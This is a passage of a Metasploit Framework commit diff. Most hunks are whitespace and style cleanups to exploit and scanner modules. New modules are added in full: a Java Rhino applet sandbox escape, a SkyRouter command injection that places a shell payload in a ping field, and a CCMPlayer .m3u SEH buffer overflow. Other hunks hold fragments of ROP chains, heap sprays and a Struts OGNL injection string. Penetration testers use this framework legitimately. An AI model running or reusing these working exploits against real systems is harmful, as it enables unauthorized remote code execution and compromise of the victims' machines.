:data => "Active Account #{u}:#{h}:#{as}",
:update => :unique_data
)
else
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{u}:#{h}:#{as}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'XDB',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Disabled Account #{u}:#{h}:#{as}",
:update => :unique_data
)
end
end
end

3
modules/auxiliary/scanner/rservices/rsh_login.rb
View File

@ -170,6 +170,9 @@ class Metasploit3 < Msf::Auxiliary
buf = sock.get_once(1)
if buf != "\x00"
buf = sock.get_once(-1)
if buf.nil?
return :failed
end
result = buf.gsub(/[[:space:]]+/, ' ')
vprint_error("Result: #{result}")
return :skip_user if result =~ /locuser too long/

19
modules/auxiliary/scanner/sap/sap_service_discovery.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -11,7 +7,7 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SAP Service Discovery',
'Version' => '$Revision$',
'Description' => %q{ Scans for listening SAP services. },
'References' =>
[
@ -189,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary
when /^39[0-9][0-9]$/
service = "ITS AGate sapavw00_<INST>"
when /^4[0-9][0-9]00/
"IGS Multiplexer"
service = "IGS Multiplexer"
when /^8200$/
service = "XI JMS/JDBC/File Adapter"
when /^8210$/
@ -205,7 +200,7 @@ class Metasploit3 < Msf::Auxiliary
when /^4445$/
service = "IPC Data Loader"
when /^9999$/
"IPC Server"
service = "IPC Server"
when /^3[0-9][0-9](0|1)(1|2|3|4|5|6|7|8$)/
service = "SAP Software Deployment Manager"
when /^2000(3|4|5|6|7$)/
@ -229,16 +224,18 @@ class Metasploit3 < Msf::Auxiliary
end
print_good("#{ip}:#{port}\t - #{service} OPEN")
=begin
report_note(:host => "#{ip}",
:proto => 'TCP',
:port => "#{port}",
:type => 'SAP',
:data => "#{service}")
=end
r << [ip,port,"open"]
r << [ip,port,"open", service]
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port}\t - TCP closed")
r << [ip,port,"closed"]
r << [ip,port,"closed", "service"]
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Interrupt
raise $!
@ -257,7 +254,7 @@ class Metasploit3 < Msf::Auxiliary
end
r.each do |res|
report_service(:host => res[0], :port => res[1], :state => res[2])
report_service(:host => res[0], :port => res[1], :state => res[2], :name => res[3])
end
end
end

1
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -330,6 +330,7 @@ class Metasploit3 < Msf::Auxiliary
end
#copy paste from rex::socket cause we need only ipv4
#NOTE: Breaks msftidy's rule on long lines, should be refactored for readability.
def is_ipv4?(addr)
(addr =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))$/) ? true : false
end

6
modules/exploits/linux/misc/accellion_fta_mpipe2.rb
View File

@ -112,12 +112,12 @@ class Metasploit3 < Msf::Exploit::Remote
1, # Sequence Number (must be the lowest seen from Source ID)
33 # Execute (pass message to destination)
].pack("CCNC") + packet
data = [ simple_checksum(header) ].pack("n") + header
enc = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)
udp_sock.put("\x01" + enc)
handler
disconnect_udp
end

10
modules/exploits/linux/misc/drb_remote_codeexec.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Distributed Ruby Send instance_eval/syscall Code Execution',
'Description' => %q{
This module exploits remote code execution vulnerabilities in dRuby
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Mar 23 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
serveruri = datastore['URI']
DRb.start_service
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
j = p.send(:syscall,20)
# syscall open
# syscall open
i = p.send(:syscall,8,filename,0700)
# syscall write
p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
# not vulnerable
rescue SecurityError => e
print_status('target is not vulnerable')
# likely 64bit system

122
modules/exploits/multi/browser/java_rhino.rb Normal file
View File

@ -0,0 +1,122 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the Rhino Script Engine that
can be used by a Java Applet to run arbitrary Java code outside of
the sandbox. The vulnerability affects version 7 and version 6 update
27 and earlier, and should work on any browser that supports Java
(for example: IE, Firefox, Google Chrome, etc)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Michael Schierl', # Discovery
'juan vazquez', # metasploit module
'Edward D. Teach <teach@consortium-of-pwners.net>',
'sinn3r'
],
'References' =>
[
[ 'CVE', '2011-3544' ],
[ 'OSVDB', '76500' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ],
[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
],
'Platform' => [ 'java', 'win', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
}
],
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Apple OSX',
{
'ARCH' => ARCH_X86,
'Platform' => 'osx'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 18 2011'
))
end
def on_request_uri( cli, request )
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect(cli, get_resource() + '/', '')
return
end
print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...")
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
return
end
paths = [
[ "Exploit.class" ]
]
p = regenerate_payload(cli)
jar = p.encoded_jar
paths.each do |path|
1.upto(path.length - 1) do |idx|
full = path[0,idx].join("/") + "/"
if !(jar.entries.map{|e|e.name}.include?(full))
jar.add_file(full, '')
end
end
fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb")
data = fd.read(fd.stat.size)
jar.add_file(path.join("/"), data)
fd.close
end
print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
def generate_html
html = "<html><head></head>"
html += "<body>"
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
html += "</applet></body></html>"
return html
end
end

4
modules/exploits/multi/browser/java_signed_applet.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
signed applet is presented to the victim via a web page with
an applet tag. The victim's JVM will pop a dialog asking if
they trust the signed applet.
On older versions the dialog will display the value of CERTCN
in the "Publisher" line. Newer JVMs display "UNKNOWN" when the
signature is not trusted (i.e., it's not signed by a trusted
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 1,
'DisclosureDate' => 'Feb 19 1997'
))
register_options( [
OptString.new('CERTCN', [ true,
"The CN= value for the certificate. Cannot contain ',' or '/'",

1
modules/exploits/multi/handler.rb
View File

@ -16,6 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# This module does basically nothing
# NOTE: Because of this it's missing a disclosure date that makes msftidy angry.
#
def initialize(info = {})

80
modules/exploits/multi/http/axis2_deployer.rb
View File

@ -24,19 +24,19 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
'Version' => '$Revision$',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using SOAP.
},
'References' =>
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
@ -186,13 +186,13 @@ class Metasploit3 < Msf::Exploit::Remote
p = /Please enable REST/
1.upto 5 do
Rex::ThreadSafe.sleep(3)
if (res_rest and res_rest.code == 200 and res_rest.body.match(p) != nil)
# Try to execute the payload
res = send_request_raw({
'uri' => "/#{rpath}/services/#{name}",
'method' => 'POST',
'data' => data,
'uri' => "/#{rpath}/services/#{name}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
## rest
res = send_request_raw({
'uri' => "/#{rpath}/services/#{name}/run",
'uri' => "/#{rpath}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
@ -266,43 +266,43 @@ class Metasploit3 < Msf::Exploit::Remote
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
end
if not success and rpath != '/dswsbobje'
rpath = '/dswsbobje'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{rpath}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
rpath = '/dswsbobje'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{rpath}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin not responding")
end
if not (res.kind_of? Rex::Proto::Http::Response)
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin not responding")
end
if res.code == 404
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin returned code 404")
end
if res.code == 404
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
end
end
if success
print_good("http://#{rhost}:#{rport}/#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")

4
modules/exploits/multi/http/glassfish_deployer.rb
View File

@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
plat = detect_platform(res.body)
arch = detect_arch(res.body)
# No arch or platform found?
return nil if (not arch or not plat)
@ -779,7 +779,7 @@ class Metasploit3 < Msf::Exploit::Remote
'GET' => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
}
#auth bypass
if version == '3.0' or version == '2.x' or version == '9.x'
success = try_glassfish_auth_bypass(version)

2
modules/exploits/multi/http/phpldapadmin_query_engine.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the lib/functions.php that allows
attackers input parsed directly to the create_function() php function. A patch was
attackers input parsed directly to the create_function() php function. A patch was
issued that uses a whitelist regex expression to check the user supplied input
before being parsed to the create_function() call.
},

4
modules/exploits/multi/http/spree_search_exec.rb
View File

@ -68,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Connection' => 'Close',
}
}, 0.4 ) #short timeout, we don't care about the response
if (res)
print_status("The server returned: #{res.code} #{res.message}")
end
handler
end

4
modules/exploits/multi/http/struts_code_exec.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a remote command execution vulnerability in
Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
handle unicode characters in OGNL extensive expressions passed to the web server.
By sending a specially crafted request to the Struts application it is possible to
bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
Bypassing this restriction allows for the execution of arbitrary Java code.
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
uri << "?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&"
uri << "(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\"false\")))&"
uri << "(#{var_b})((%27\\u0023#{var_d}.exec(\"CMD\")%27)(\\u0023#{var_d}\\u003d@java.lang.Runtime@getRuntime()))=1" if target['Platform'] == 'win'

10
modules/exploits/multi/misc/java_rmi_server.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
Note that it does not work against Java Management Extension (JMX) ports since those do
not support remote class loading, unless another RMI endpoint is active in the same
Java process.
RMI method calls do not support or require any sort of authentication.
},
'Author' => [ 'mihi' ],
@ -109,12 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
while not session_created?
select(nil, nil, nil, 0.25)
handler()
end
end
end
def on_request_uri(cli, request)
if request.uri =~ /\.jar$/i
if request.uri =~ /\.jar$/i
p = regenerate_payload(cli)
jar = p.encoded_jar
paths = [
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
def gen_rmi_packet
"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

8
modules/exploits/multi/misc/zend_java_bridge.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
This module takes advantage of a trust relationship issue within the
Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
between PHP and Java code within Zend Server.
When Java code is encountered Zend Server communicates with the Java Bridge. The
Java Bridge then handles the java code and creates the objects within the Java Virtual
Machine. This interaction however, does not require any sort of authentication. This
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
start_service()
send_java_require
end
def send_java_require()
connect
@ -73,11 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending java_require() request... #{path}")
sock.put(java_require)
res = sock.get_once
select(nil, nil, nil, 5) # wait for the request to be handled
create_and_exec
end
def create_and_exec
print_status("Sending Final Java Bridge Requests")

2
modules/exploits/netware/sunrpc/pkernel_callit.rb
View File

@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})

2
modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
View File

@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
sock.put("HELP ACIDBITCHEZ\r\n")
res = sock.get_once(-1,10)
if ( res and res =~ /502/ )
print_error("Not backdoored")
else

2
modules/exploits/unix/http/contentkeeperweb_mimencode.rb
View File

@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
req << "Host: #{datastore['RHOST']}\r\n"
sock.put(req + "\r\n\r\n")
handler
handler
disconnect
select(nil,nil,nil,3) # Wait for session creation.
if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/

64
modules/exploits/unix/http/ctek_skyrouter.rb Normal file
View File

@ -0,0 +1,64 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
},
'Author' => [ 'savant42' ], #with module help from kos
'License' => MSF_LICENSE,
'References' => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat-e bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Sep 8 2011', # CGI historical date :)
'DefaultTarget' => 0))
end
def exploit
post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
uri = '/apps/a3/cfg_ethping.cgi'
print_status("Sending HTTP request for #{uri}")
res = send_request_cgi( {
'global' => true,
'uri' => uri,
'method' => "POST",
'data' => post_data
}, 30)
if res
print_status("The server responded with HTTP CODE #{res.code}")
else
print_status("The server did not respond to our request")
end
handler
end
end

2
modules/exploits/unix/http/lifesize_room.rb
View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
Room is an appliance and thus the environment is limited
resulting in a small set of payload options.
},
'Author' =>
'Author' =>
[
# SecureState R&D Team - Special Thanks To Chris Murrey
'Spencer McIntyre',

4
modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
View File

@ -112,10 +112,10 @@ EOS
if not res
if not session_created?
print_error('Unable to complete XML-RPC request')
print_error('Unable to complete XML-RPC request')
return nil
end
# no response, but session created!!!
return true
end

2
modules/exploits/unix/webapp/php_include.rb
View File

@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
# print_status("Sending #{tpath+uri}")
begin
if http_method == "GET"
if http_method == "GET"
response = send_request_raw( {
'global' => true,
'uri' => tpath+uri,

2
modules/exploits/windows/antivirus/ams_xfr.rb
View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
disconnect
end
def exploit

2
modules/exploits/windows/brightstor/tape_engine_8A.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))

2
modules/exploits/windows/browser/adobe_flashplayer_avm.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
fd = File.open( path, "rb" )
@swf = fd.read(fd.stat.size)
fd.close
super
end

2
modules/exploits/windows/browser/cisco_anyconnect_exec.rb
View File

@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
handler(cli)
return
end
if request.uri.match(/updates\.txt/)
print_status("Client requested: #{request.uri}. Sending updates.txt")
updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))

4
modules/exploits/windows/browser/java_codebase_trust.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'java',
}
],
# Native payloads aren't currently supported (only work with jar/war)
=begin
[ 'Windows x86',
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 15 2011'
))
register_options(
[
# This is the default for a 32-bit Windows install

4
modules/exploits/windows/browser/java_docbase_bof.rb
View File

@ -179,7 +179,7 @@ EOS
0x41414141,
0x41414141,
'st_eax_ecx',
# Call our dword-stub
'jmp_ecx',
@ -205,7 +205,7 @@ EOS
# Adjust it to skip the non-payload parts
'add_58_eax',
# Execute it !
'jmp_eax',

4
modules/exploits/windows/browser/mozilla_mchannel.rb
View File

@ -208,7 +208,7 @@ class Metasploit3 < Msf::Exploit::Remote
# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")
# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
rop_pivot << [0x6D325BFC].pack("V*")
@ -312,7 +312,7 @@ class Metasploit3 < Msf::Exploit::Remote
var #{js_filler} = unescape("%u4344%u4142");
while(#{js_filler}.length < 0x201) {#{js_filler} += #{js_filler};}
while(#{js_ret_addr_name}.length < 0x80) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,0x18/2);

8
modules/exploits/windows/browser/mozilla_nstreerange.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class
)
end
def prepare_payload(target, p)
base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
spray_size = datastore['SpraySize']
@ -177,11 +177,11 @@ class Metasploit3 < Msf::Exploit::Remote
]
end
}
add_call.call(target['LLOffset'], base_offset, 0) # use dummy LoadLibrary call to push valid fourth VirtualProtect argument on stack
add_call.call(target['VPOffset'], 0x10000, 0x40) # call VirtualProtect to make heap executable
add_call.call(0xDEADBEEF, 0, 0, true) # call our shellcode
callchain.flatten!
callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain

6
modules/exploits/windows/browser/mozilla_reduceright.rb
View File

@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
my_target = targets[2]
end
end
table = [junk(2)].pack('v*')
table << [
0x0c000048,
@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
my_target['pivot2'],
junk,
junk,
junk,
junk,
junk,
junk,
junk,
@ -333,7 +333,7 @@ class Metasploit3 < Msf::Exploit::Remote
</body>
<html>
HTML
end
html = html.gsub(/^\t\t/, '')

2
modules/exploits/windows/browser/ms11_003_ie_css_import.rb
View File

@ -399,7 +399,7 @@ EOS
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc',
:unused,
'pop esi / ret',
:unused,
:unused,

2
modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
View File

@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
if my_target.name =~ /IE8/
pivot_rop =
pivot_rop =
[ # Pivot to get to ROP Chain
0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
pivot_addr,

2
modules/exploits/windows/fileformat/aol_desktop_linktag.rb
View File

@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Platform' => 'win',
'Targets' =>
[
[

2
modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
View File

@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def nops(rop=false, n=1)
return rop ? [0x61326003] * n : [0x90909090] * n
return rop ? [0x61326003] * n : [0x90909090] * n
end
def exploit

98
modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb Normal file
View File

@ -0,0 +1,98 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
'Description' => %q{
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
a m3u playlist with a long track name, a SEH exception record can be overwritten
with parts of the controllable buffer. SEH execution is triggered after an
invalid read of an injectible address, thus allowing arbitrary code execution.
This module works on multiple Windows platforms including: Windows XP SP3,
Windows Vista, and Windows 7.
},
'License' => MSF_LICENSE,
'Author' => ['Rh0'], # discovery and metasploit module
'References' =>
[
['OSVDB', '77453'],
['URL', 'http://www.exploit-db.com/exploits/18178/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 0x1000,
'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
'DisableNops' => 'True',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'CCMPlayer 1.5',
{
# pop esi / pop ebx / ret (in ccmplay.exe)
# tweak it if necessary
'Ret' => 0x00403ca7, # last NULL in buffer is accepted
'Offset' => 0x1000
}
]
],
'Privileged' => false,
'DisclosureDate' => '30 Nov 2011', # to my knowledge
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']),
], self.class)
end
def exploit
m3u = "C:\\"
# shellcode
m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
m3u << payload.encoded
# junk
m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
# need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
# to trigger SEH
m3u << [0xffffffff].pack("V")
# pad
m3u << rand_text_alpha_upper(3)
# long jmp: jmp far back to shellcode
m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
# NSEH: jmp short back to long jmp instruction
m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
# pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
m3u << rand_text_alpha_upper(2)
# SEH Exception Handler Address -> p/p/r
m3u << [target.ret].pack("V")
m3u << ".mp3\r\n" # no crash without it
print_status("Creating '#{datastore['FILENAME']}' file ...")
# Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
file_create(m3u)
end
end

10
modules/exploits/windows/fileformat/cytel_studio_cy3.rb
View File

@ -20,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow',
'Description' => %q{
'Description' => %q{
This module exploits a stack based buffer overflow found
in Cytel Studio <= 9.0. The overflow is triggered during the
copying of strings to a stack buffer of 256 bytes.
},
'License' => MSF_LICENSE,
'Author' =>
[
[
'Luigi Auriemma', # Initial Discovery/PoC
'James Fitts' # Metasploit Module (Thx Juan & Jeff)
],
@ -53,9 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
[
[
# File version 8.0.0.1
'Cytel Studio 9.0',
{
'Ret' => 0x73e58e01, # p/p/r mfc42.dll
'Cytel Studio 9.0',
{
'Ret' => 0x73e58e01, # p/p/r mfc42.dll
'Offset' => 500
}
],

4
modules/exploits/windows/fileformat/fatplayer_wav.rb
View File

@ -73,11 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << "\xe9\x60\xf0\xff\xff" # Jump back 4000 bytes
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

4
modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Foxit PDF Reader 4.2 Javascript File Write',
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
